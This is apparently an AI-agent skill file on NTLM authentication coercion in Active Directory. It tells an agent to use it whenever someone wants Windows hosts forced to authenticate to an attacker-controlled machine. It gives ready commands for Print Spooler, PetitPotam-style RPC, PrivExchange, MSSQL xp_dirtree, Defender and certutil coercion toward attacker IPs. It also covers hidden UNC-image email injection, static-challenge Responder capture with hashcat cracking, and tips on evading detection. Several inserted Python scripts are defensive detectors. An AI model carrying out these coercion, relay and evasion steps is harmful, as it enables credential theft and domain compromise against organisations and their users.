Hacktricks-skills windows-ntlm-coercion

Guide for NTLM authentication coercion attacks in Active Directory environments. Use this skill whenever the user needs to force Windows systems to authenticate to an attacker-controlled host, capture NTLM hashes, or perform relay attacks. Trigger on mentions of: authentication coercion, NTLM relay, Print Spooler abuse, RPC coercion, PetitPotam, MS-EVEN, MS-EFSR, PrivExchange, or any scenario where you need to make a Windows system authenticate to a specific target.

Install

Source: clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
Manifest: skills/windows-hardening/active-directory-methodology/printers-spooler-service-abuse/SKILL.MD

Source content

Windows NTLM Authentication Coercion

This skill provides methodology for forcing Windows systems to authenticate to attacker-controlled hosts, enabling NTLM hash capture and relay attacks in Active Directory environments.

⚠️ Authorization Required

Only use these techniques on systems you own or have explicit written authorization to test. Unauthorized use is illegal and unethical.

When to Use This Skill

Use this skill when:

  • You need to capture NTLM hashes from Windows systems
  • You want to perform NTLM relay attacks
  • You're testing Active Directory security controls
  • You need to coerce authentication from specific targets (DCs, servers, workstations)
  • You're assessing Print Spooler, RPC, or Exchange vulnerabilities

Core Concept

NTLM authentication coercion tricks Windows into initiating an authentication request to a host you control. When the target authenticates, you can:

  1. Capture the NTLM hash (for offline cracking)
  2. Relay the authentication to another service (for privilege escalation)
  3. Extract tickets (if unconstrained delegation is configured)
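The chain described above leaves a recognisable trace on whichever host the relayed authentication lands on: Security event 4624 showing a computer account (a name ending in `$`) logging on over NTLM, logon type 3, from an address that is not that computer's own. The script below is an added example for this page, not HackTricks' code: it parses constructed 4624 records (JSON lines, shaped like a SIEM export) against a hypothetical asset inventory and reports machine-account NTLM logons from the wrong source, additionally calling out NTLMv1 responses, which are the ones worth cracking offline.

```python
"""Flag NTLM network logons by computer accounts that arrive from an address
other than the account's own host, the pattern a coerced-and-relayed
authentication leaves in Security event 4624 on the relay target.

Added example for this page, not HackTricks' code. The event records are
constructed samples shaped like Event ID 4624 fields; HOST_INVENTORY is a
hypothetical asset inventory (assumed names and addresses).
"""
import json

# Constructed sample: Security 4624 events exported as JSON lines.
SAMPLE_EVENTS = """\
{"EventID":4624,"LogonType":3,"AuthenticationPackageName":"NTLM","LmPackageName":"NTLM V2","TargetUserName":"DC01$","TargetDomainName":"CORP","IpAddress":"10.0.0.10","WorkstationName":"DC01"}
{"EventID":4624,"LogonType":3,"AuthenticationPackageName":"NTLM","LmPackageName":"NTLM V2","TargetUserName":"DC01$","TargetDomainName":"CORP","IpAddress":"10.0.5.77","WorkstationName":"DC01"}
{"EventID":4624,"LogonType":3,"AuthenticationPackageName":"NTLM","LmPackageName":"NTLM V1","TargetUserName":"FS02$","TargetDomainName":"CORP","IpAddress":"10.0.5.77","WorkstationName":"FS02"}
{"EventID":4624,"LogonType":3,"AuthenticationPackageName":"Kerberos","LmPackageName":"-","TargetUserName":"DC01$","TargetDomainName":"CORP","IpAddress":"10.0.0.10","WorkstationName":"DC01"}
{"EventID":4624,"LogonType":2,"AuthenticationPackageName":"NTLM","LmPackageName":"NTLM V2","TargetUserName":"alice","TargetDomainName":"CORP","IpAddress":"-","WorkstationName":"WS17"}
"""

# Assumed inventory: computer account -> the address(es) it legitimately authenticates from.
HOST_INVENTORY = {
    "DC01$": {"10.0.0.10"},
    "FS02$": {"10.0.0.22"},
}


def parse_events(text):
    """One dict per non-empty JSON line."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def find_suspicious_machine_logons(events, inventory):
    """Return machine-account NTLM network logons that do not come from the
    account's own host, plus any that used an NTLMv1 response."""
    findings = []
    for ev in events:
        # Only network logons (type 3) over NTLM are candidates; Kerberos and
        # interactive logons are not produced by coercion.
        if ev.get("EventID") != 4624 or ev.get("LogonType") != 3:
            continue
        if ev.get("AuthenticationPackageName") != "NTLM":
            continue
        account = ev.get("TargetUserName", "")
        if not account.endswith("$"):
            continue  # coercion yields computer-account authentication
        src = ev.get("IpAddress")
        known = inventory.get(account)
        reasons = []
        if known is not None and src not in known:
            reasons.append(f"source {src} is not {account}'s own address")
        if ev.get("LmPackageName") == "NTLM V1":
            reasons.append("NTLMv1 response (downgrade, crackable offline)")
        if reasons:
            findings.append({"account": account, "source": src, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in find_suspicious_machine_logons(parse_events(SAMPLE_EVENTS), HOST_INVENTORY):
        print(f"{f['account']} from {f['source']}: " + "; ".join(f["reasons"]))
```

Run on the sample it reports DC01$ arriving from 10.0.5.77 (one reason) and FS02$ from the same address with an NTLMv1 response (two reasons); the Kerberos and interactive logons are ignored. On a real estate the inventory comes from DNS or the CMDB, and the rule is most valuable on hosts that should never see a DC's computer account over NTLM at all, such as AD CS web enrollment servers.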

Method 1: Print Spooler Service Abuse

Prerequisites

  • Print Spooler service enabled on target
  • Valid domain credentials
  • Network access to target

Step 1: Enumerate Windows Servers

# -notlike needs wildcards: "2016" alone only excludes an OS string that is exactly "2016", i.e. nothing
Get-ADComputer -Filter {(OperatingSystem -like "*windows*server*") -and (OperatingSystem -notlike "*2016*") -and (Enabled -eq "True")} -Properties OperatingSystem | select Name | ft -HideTableHeaders > servers.txt

Step 2: Check for Spooler Service

Option A: PowerShell (Windows)

. .\Get-SpoolStatus.ps1
ForEach ($server in Get-Content servers.txt) {Get-SpoolStatus $server}

Option B: rpcdump.py (Linux)

rpcdump.py DOMAIN/USER:PASSWORD@SERVER.DOMAIN.COM | grep MS-RPRN

Step 3: Trigger Authentication

Windows (SpoolSample):

SpoolSample.exe <TARGET> <RESPONDER_IP>

Linux (dementor.py):

python dementor.py -d domain -u username -p password <RESPONDER_IP> <TARGET>

Linux (printerbug.py):

printerbug.py 'domain/username:password'@<Printer_IP> <RESPONDER_IP>

Combining with Unconstrained Delegation

If you've compromised a host with unconstrained delegation:

  1. Force the printer to authenticate to that host
  2. The printer's computer account TGT gets cached in memory
  3. Extract the ticket and use Pass-the-Ticket

Method 2: RPC Coercion

Coercion Matrix

Protocol   Pipe                Interface UUID                          Opnums                          Tool
MS-RPRN    \PIPE\spoolss       12345678-1234-abcd-ef00-0123456789ab    62, 65                          PrinterBug
MS-PAR     \PIPE\spoolss       76f03f96-cdfd-44fc-a22c-64950a001209    0                               -
MS-EFSR    \PIPE\efsrpc        c681d488-d850-11d0-8c52-00c04fd90f7e    0, 4, 5, 6, 7, 12, 13, 15, 16   PetitPotam
MS-DFSNM   \PIPE\netdfs        4fc742e0-4a10-11cf-8273-00aa004ae673    12, 13                          DFSCoerce
MS-FSRVP   \PIPE\FssagentRpc   a8e0653c-2744-4389-a61d-7373df8b2292    8, 9                            ShadowCoerce
MS-EVEN    \PIPE\even          82273fdc-e32a-18c3-3f78-827929dc23ea    9                               CheeseOunce

MS-EVEN: ElfrOpenBELW (Opnum 9)

Most effective for Tier 0 assets (DCs, RODCs, Citrix)

  • Interface: MS-EVEN over \PIPE\even
  • Call:
    ElfrOpenBELW(UNCServerName, BackupFileName, MajorVersion, MinorVersion, LogHandle)
  • Effect: Target attempts to open backup log path and authenticates to attacker UNC
  • Use case: Coerce DCs to emit NetNTLM, relay to AD CS endpoints (ESC8/ESC11)
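The matrix and the MS-EVEN entry above are, from the defender's side, a lookup table: an RPC-aware sensor (ETW, or an IDS decoding DCERPC over SMB) reports the interface UUID and opnum of each call, and those two values identify the vector regardless of which tool issued it. The script below, an added example for this page and not HackTricks' or any listed tool's code, classifies constructed call records against the page's matrix and raises severity when a UNC-path argument (the BackupFileName in the ElfrOpenBELW case) names a host outside a hypothetical allowlist.

```python
"""Map observed MS-RPC calls to the coercion vectors in the page's matrix and
flag those whose UNC-path argument points at a host outside the asset inventory.

Added example for this page (not HackTricks' or any listed tool's code). The
call records are constructed samples of what an RPC-aware sensor would report;
TRUSTED_HOSTS is a hypothetical allowlist.
"""
import re
from typing import NamedTuple, Optional

# The page's coercion matrix: protocol, pipe, interface UUID, coercible opnums, tool.
COERCION_MATRIX = [
    ("MS-RPRN",  r"\PIPE\spoolss",     "12345678-1234-abcd-ef00-0123456789ab", {62, 65}, "PrinterBug"),
    ("MS-PAR",   r"\PIPE\spoolss",     "76f03f96-cdfd-44fc-a22c-64950a001209", {0}, None),
    ("MS-EFSR",  r"\PIPE\efsrpc",      "c681d488-d850-11d0-8c52-00c04fd90f7e", {0, 4, 5, 6, 7, 12, 13, 15, 16}, "PetitPotam"),
    ("MS-DFSNM", r"\PIPE\netdfs",      "4fc742e0-4a10-11cf-8273-00aa004ae673", {12, 13}, "DFSCoerce"),
    ("MS-FSRVP", r"\PIPE\FssagentRpc", "a8e0653c-2744-4389-a61d-7373df8b2292", {8, 9}, "ShadowCoerce"),
    ("MS-EVEN",  r"\PIPE\even",        "82273fdc-e32a-18c3-3f78-827929dc23ea", {9}, "CheeseOunce"),
]


class RpcCall(NamedTuple):
    pipe: str
    interface_uuid: str
    opnum: int
    string_args: tuple  # string parameters as decoded by the sensor


class Finding(NamedTuple):
    protocol: str
    tool: Optional[str]
    opnum: int
    unc_hosts: tuple
    untrusted_unc: bool


# A UNC path \\host\share...: capture the host part.
UNC_RE = re.compile(r"^\\\\([^\\\s]+)\\")


def unc_hosts(args):
    """Hosts named by any UNC-path argument, lower-cased for comparison."""
    hosts = []
    for arg in args:
        m = UNC_RE.match(arg)
        if m:
            hosts.append(m.group(1).lower())
    return tuple(hosts)


def classify(call, trusted_hosts):
    """Return a Finding if (interface UUID, opnum) is a known coercion vector, else None.
    The UUID is decisive; the pipe name is informational only, because the same
    interface can be bound over other endpoints."""
    uuid = call.interface_uuid.lower()
    trusted = {h.lower() for h in trusted_hosts}
    for protocol, _pipe, iface, opnums, tool in COERCION_MATRIX:
        if iface == uuid and call.opnum in opnums:
            hosts = unc_hosts(call.string_args)
            return Finding(protocol, tool, call.opnum, hosts,
                           any(h not in trusted for h in hosts))
    return None


def triage(calls, trusted_hosts):
    """Pair each matching call with its finding; non-matching calls are dropped."""
    out = []
    for call in calls:
        finding = classify(call, trusted_hosts)
        if finding is not None:
            out.append((call, finding))
    return out


# Constructed sample observations (hypothetical names and addresses).
TRUSTED_HOSTS = {"dc01", "fs02", "10.0.0.10", "10.0.0.22"}
SAMPLE_CALLS = [
    # ElfrOpenBELW with a backup path on an unknown host: the MS-EVEN case above.
    RpcCall(r"\PIPE\even", "82273fdc-e32a-18c3-3f78-827929dc23ea", 9,
            (r"\\DC01", r"\\10.0.5.77\backup\app.evt")),
    # MS-RPRN notification call naming an inventoried file server: matches, but the UNC target is trusted.
    RpcCall(r"\PIPE\spoolss", "12345678-1234-abcd-ef00-0123456789ab", 65, (r"\\fs02\share",)),
    # Unrelated MS-SRVS call: not a coercion vector.
    RpcCall(r"\PIPE\srvsvc", "4b324fc8-1670-01d3-1278-5a47bf6ee188", 15, ()),
]

if __name__ == "__main__":
    for call, f in triage(SAMPLE_CALLS, TRUSTED_HOSTS):
        sev = "HIGH" if f.untrusted_unc else "MEDIUM"
        print(f"[{sev}] {f.protocol} opnum {f.opnum} ({f.tool or 'no public tool'}) via {call.pipe} -> {f.unc_hosts}")
```

Matching on UUID and opnum rather than on the pipe name matters because the opnums in the matrix are ordinary, documented operations: a backup product really does call into MS-EVEN with a UNC path, so the untrusted-host check is what separates a finding worth paging on from background noise.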

Method 3: PrivExchange (Exchange Server)

Overview

Exchange Server's PushSubscription feature allows any domain user with a mailbox to force the Exchange server to authenticate to any client-provided host over HTTP.

Impact

  • Exchange service runs as SYSTEM
  • Has WriteDacl privileges on domain (pre-2019 CU)
  • Can relay to LDAP and extract NTDS.dit
  • Grants Domain Admin access with any authenticated user account

Execution

# Use PrivExchange tool
python privexchange.py -u username -p password -t <TARGET_IP> -d domain

Method 4: Inside Windows Coercion

Defender MpCmdRun

C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2010.7-0\MpCmdRun.exe -Scan -ScanType 3 -File \\<YOUR_IP>\file.txt

MSSQL Coercion

Using xp_dirtree:

EXEC xp_dirtree '\\10.10.17.231\pwn', 1, 1

Using MSSQLPwner:

# Relay to specific server
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-name SRV01 ntlm-relay 192.168.45.250

# Relay using chain ID
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -chain-id 2e9a3696-d8c2-4edd-9bcc-2908414eeb25 ntlm-relay 192.168.45.250

# Local server relay
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth ntlm-relay 192.168.45.250

Certutil Coercion

certutil.exe -syncwithWU \\127.0.0.1\share

Method 5: HTML Injection

Via Email

Send email with embedded image to target user:

<img src="\\10.10.17.231\test.ico" height="1" width="1" />

When opened, the user's browser attempts to authenticate to the UNC path.

Via MitM

Inject into web pages the user visits:

<img src="\\10.10.17.231\test.ico" height="1" width="1" />
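Both injection variants above rely on the same mechanism: an HTML attribute whose value is a UNC path (or a file:// URL), which the mail client or browser resolves as an SMB connection. A mail gateway or web proxy can catch that before a user ever opens the message. The scanner below is an added example for this page, not HackTricks' code; it walks constructed HTML (the 10.10.17.231 address is the page's own sample value, the other hosts are hypothetical) and reports every fetching attribute that points at a UNC or file:// host.

```python
"""Find HTML attributes that would make a mail client or browser fetch a UNC
path (\\host\share\...) or file:// URL, the trigger behind the image-injection
methods above.

Added example for this page, not HackTricks' code. SAMPLE_MESSAGE is a
constructed message body; 10.10.17.231 is the page's sample address and the
remaining hosts are hypothetical.
"""
import re
from html.parser import HTMLParser

# Attributes whose value the client resolves automatically or on click.
FETCH_ATTRS = {"src", "href", "background", "data", "poster", "action"}

UNC_RE = re.compile(r"^\\\\([^\\/]+)[\\/]")
# file://host/share and file:////host/share; a drive-letter path (file:///C:/...) is excluded.
FILE_URL_RE = re.compile(r"^file:/{2,}([^/\\:]+)[/\\]", re.IGNORECASE)


def unc_host(value):
    """Host named by a UNC path or file:// URL, or None for any other reference."""
    v = value.strip()
    m = UNC_RE.match(v) or FILE_URL_RE.match(v)
    return m.group(1) if m else None


class UncReferenceScanner(HTMLParser):
    """Collects (tag, attribute, host, raw value) for every UNC/file:// reference."""

    def __init__(self):
        super().__init__()
        self.hits = []

    def handle_starttag(self, tag, attrs):
        # html.parser lower-cases tag and attribute names and unescapes entities,
        # so an obfuscated  &#92;&#92;host  value is seen as \\host here.
        for name, value in attrs:
            if value and name in FETCH_ATTRS:
                host = unc_host(value)
                if host:
                    self.hits.append((tag, name, host, value))


def scan_html(html):
    scanner = UncReferenceScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.hits


SAMPLE_MESSAGE = r"""<html><body>
<p>Quarterly report attached.</p>
<img src="\\10.10.17.231\test.ico" height="1" width="1" />
<img src="https://cdn.example.test/logo.png" alt="logo">
<link rel="stylesheet" href="file://fileserver.corp.example/style.css">
<a href="\\fs01\public\report.docx">report</a>
</body></html>"""

if __name__ == "__main__":
    for tag, attr, host, raw in scan_html(SAMPLE_MESSAGE):
        print(f"<{tag} {attr}> -> {host}   ({raw})")
```

The 1x1 tracking image is flagged along with a stylesheet and a link, because the policy question is the same for all of them: whether a message from outside should ever be allowed to reference an internal UNC host, and whether outbound SMB to the Internet is blocked at the edge, which is what stops the authentication from leaving the network even when a user does open such a message.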

Post-Exploitation: Cracking NTLMv1

Capture Setup

Set Responder challenge to weak value:

# In Responder configuration
challenge = "1122334455667788"

Cracking

Use hashcat or john:

# Hashcat (mode 5500 is NetNTLMv1 / NetNTLMv1+ESS; 5600 is NetNTLMv2)
hashcat -m 5500 ntlm_hashes.txt wordlist.txt

# John the Ripper (netntlm is the NTLMv1 format; netntlmv2 for NTLMv2)
john --format=netntlm ntlm_hashes.txt
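The capture setup above is also its own signature. A real server picks the 8-byte ServerChallenge at random, so a CHALLENGE_MESSAGE carrying the fixed value 1122334455667788 identifies a capture tool on the wire; and a server that omits the extended-session-security flag is inviting any client still permitted to use NTLMv1 to return the plain response that the hashcat line above cracks. The parser below is an added example for this page, not HackTricks' or Responder's code: it decodes the NTLMSSP Type 2 blob as an IDS or proxy would see it inside SMB, HTTP or LDAP authentication (layout per MS-NLMP 2.2.1.2) and raises both alerts; the blobs are constructed with build_challenge_message, and the target name and version bytes are arbitrary sample values.

```python
"""Parse an NTLMSSP CHALLENGE_MESSAGE (the server's "Type 2" blob) and flag the
two things the capture setup above relies on: the fixed challenge
1122334455667788, and a server that does not offer extended session security.

Added example for this page, not HackTricks' or Responder's code. Sample blobs
are constructed by build_challenge_message; target name and version bytes are
arbitrary sample values.
"""
import struct

NTLMSSP_SIGNATURE = b"NTLMSSP\x00"
CHALLENGE_MESSAGE = 2
NTLMSSP_NEGOTIATE_EXTENDED_SESSIONSECURITY = 0x00080000
NTLMSSP_NEGOTIATE_VERSION = 0x02000000
# The challenge value the page sets in Responder's configuration; a real server chooses it at random.
STATIC_CHALLENGE = bytes.fromhex("1122334455667788")


def build_challenge_message(challenge, flags, target_name="CORP"):
    """Constructed CHALLENGE_MESSAGE for the demo (sample input, not captured traffic)."""
    if len(challenge) != 8:
        raise ValueError("ServerChallenge is 8 bytes")
    name = target_name.encode("utf-16-le")
    header_len = 56 if flags & NTLMSSP_NEGOTIATE_VERSION else 48
    msg = bytearray(NTLMSSP_SIGNATURE)
    msg += struct.pack("<I", CHALLENGE_MESSAGE)
    msg += struct.pack("<HHI", len(name), len(name), header_len)  # TargetNameFields
    msg += struct.pack("<I", flags)                                # NegotiateFlags
    msg += challenge                                               # ServerChallenge
    msg += b"\x00" * 8                                             # Reserved
    msg += struct.pack("<HHI", 0, 0, header_len + len(name))       # TargetInfoFields (empty)
    if flags & NTLMSSP_NEGOTIATE_VERSION:
        msg += b"\x0a\x00\x61\x4a\x00\x00\x00\x0f"                 # Version (sample bytes)
    msg += name                                                    # payload: TargetName
    return bytes(msg)


def parse_challenge_message(blob):
    """Return flags, challenge and target name from a CHALLENGE_MESSAGE blob."""
    if len(blob) < 48 or blob[:8] != NTLMSSP_SIGNATURE:
        raise ValueError("not an NTLMSSP message")
    (msg_type,) = struct.unpack_from("<I", blob, 8)
    if msg_type != CHALLENGE_MESSAGE:
        raise ValueError(f"expected CHALLENGE_MESSAGE (2), got type {msg_type}")
    name_len, _name_max, name_off = struct.unpack_from("<HHI", blob, 12)
    (flags,) = struct.unpack_from("<I", blob, 20)
    challenge = blob[24:32]
    target = blob[name_off:name_off + name_len].decode("utf-16-le", "replace")
    return {"flags": flags, "challenge": challenge, "target_name": target}


def assess_challenge(blob):
    """Parse the blob and attach the alerts a monitor should raise for it."""
    info = parse_challenge_message(blob)
    alerts = []
    if info["challenge"] == STATIC_CHALLENGE:
        alerts.append("static challenge 1122334455667788: server is a capture tool tuned for NTLMv1 cracking")
    if not info["flags"] & NTLMSSP_NEGOTIATE_EXTENDED_SESSIONSECURITY:
        alerts.append("extended session security not offered: NTLMv1-capable clients will answer with a plain NTLMv1 response")
    info["alerts"] = alerts
    return info


if __name__ == "__main__":
    genuine = build_challenge_message(bytes.fromhex("0123456789abcdef"), 0xE28A8215)
    rogue = build_challenge_message(STATIC_CHALLENGE, 0xE2828215)  # ESS bit cleared
    for label, blob in (("genuine", genuine), ("rogue", rogue)):
        print(label, assess_challenge(blob)["alerts"])
```

The second alert only matters where clients are still allowed to send NTLMv1 responses; the durable fix is an LmCompatibilityLevel that refuses NTLMv1 on the client side, after which the static challenge is merely a fingerprint of the capture tool rather than a path to a cracked password.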

Tool References

Tool                  Purpose              Repository
PetitPotam            MS-EFSR coercion     https://github.com/topotam/PetitPotam
DFSCoerce             MS-DFSNM coercion    https://github.com/Wh04m1001/DFSCoerce
ShadowCoerce          MS-FSRVP coercion    https://github.com/ShutdownRepo/ShadowCoerce
Coercer               RPC coercion         https://github.com/p0dalirius/Coercer
MSSQLPwner            MSSQL relay          https://github.com/ScorpionesLabs/MSSqlPwner
SharpSystemTriggers   C# auth triggers     https://github.com/cube0x0/SharpSystemTriggers
krbrelayx             Relay attacks        https://github.com/dirkjanm/krbrelayx

Best Practices

  1. Start with MS-EVEN - Most reliable for DCs and Tier 0
  2. Use multiple methods - Different systems have different services enabled
  3. Check for unconstrained delegation - Can extract TGTs from coerced authentications
  4. Combine with AD CS - Relay to ESC8/ESC11 for certificate enrollment
  5. Document findings - Track which methods work on which systems

Detection Evasion

  • Use legitimate-looking UNC paths
  • Time attacks during business hours
  • Avoid rapid-fire attempts that trigger alerts
  • Consider using existing tools already on the network

References